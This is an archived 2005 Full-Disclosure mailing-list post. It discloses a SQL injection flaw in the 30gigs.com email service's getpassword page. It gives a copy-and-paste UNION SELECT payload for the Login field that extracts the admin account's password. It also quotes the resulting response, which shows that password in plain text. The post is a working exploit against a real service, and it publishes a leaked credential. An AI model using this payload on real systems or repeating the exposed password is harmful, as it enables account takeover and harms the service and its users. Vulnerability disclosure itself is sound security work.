[Full-disclosure] 30gigs SQL injection vulnerability

From: cumhur onat (cumhuronat_at_gmail.com)
Date: 11/16/05

  • Next message: Barrie Dempster: "Re: [Full-disclosure] Three years and ten months without a patch"
    Date: Wed, 16 Nov 2005 15:16:24 +0200
    To: full-disclosure@lists.grok.org.uk
    
    
    

    I found a sql injection vulnerability, which leads to password disclosure in
    30gigs.com <http://30gigs.com> email service.
    The vulnerability exists in http://www.30gigs.com/getpassword/ page due to
    lack of validation of user submitted data.
    Proof of Concept:
    enter http://www.30gigs.com/getpassword/
    and copy & paster this code in the Login field, finally submit the form.

    not_existant' union select
    1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
    userLogin='admin

    it will give an output like below, in which "runsit" corresponds to the
    password of account "admin"
    We have sent the password for your not_existant' union select
    1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
    userLogin='admin@30gigs.com account to runsit

    The site has been notified about the vulnerability 2 weeks ago, but no
    response was taken.

    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: Barrie Dempster: "Re: [Full-disclosure] Three years and ten months without a patch"

    Relevant Pages

    • [VULNERABILITY] PHP poster version.two
      ... This is my first time posting a vulnerability since most of my private ... If a user has their account type set to 'normal' by the administrator, ... Where James has an administrator account, and Jack doesn't. ...
      (Bugtraq)
    • [VulnWatch] Vulnerability in poster version.two
      ... This is my first time posting a vulnerability since most of my private ... If a user has their account type set to 'normal' by the administrator, ... Where James has an administrator account, and Jack doesn't. ...
      (VulnWatch)
    • [UNIX] Admin Access Vulnerability in P-News (Records Injection)
      ... housewarming rates on automated network vulnerability ... 'Member' privileges to gain elevated privileges by inserting an additional ... account due to a flaw in the 'p-news.php' file. ... Below is an example of a normal database: ...
      (Securiteam)
    • RE: about SQL injection
      ... That is a very common vulnerability. ... That means a hacker and retrieve almost everything that the account that you ... Earn your MS in Information Security ONLINE ...
      (Security-Basics)
    • Vulnerability in Amtote International homebet self service wagering system.
      ... Vulnerability in Amtote International homebet self service wagering system. ... Internet-based account wagering interface utilizing HTML and JAVA web based ... This list is provided by the SecurityFocus Security Intelligence Alert ...
      (Pen-Test)

  • Quantcast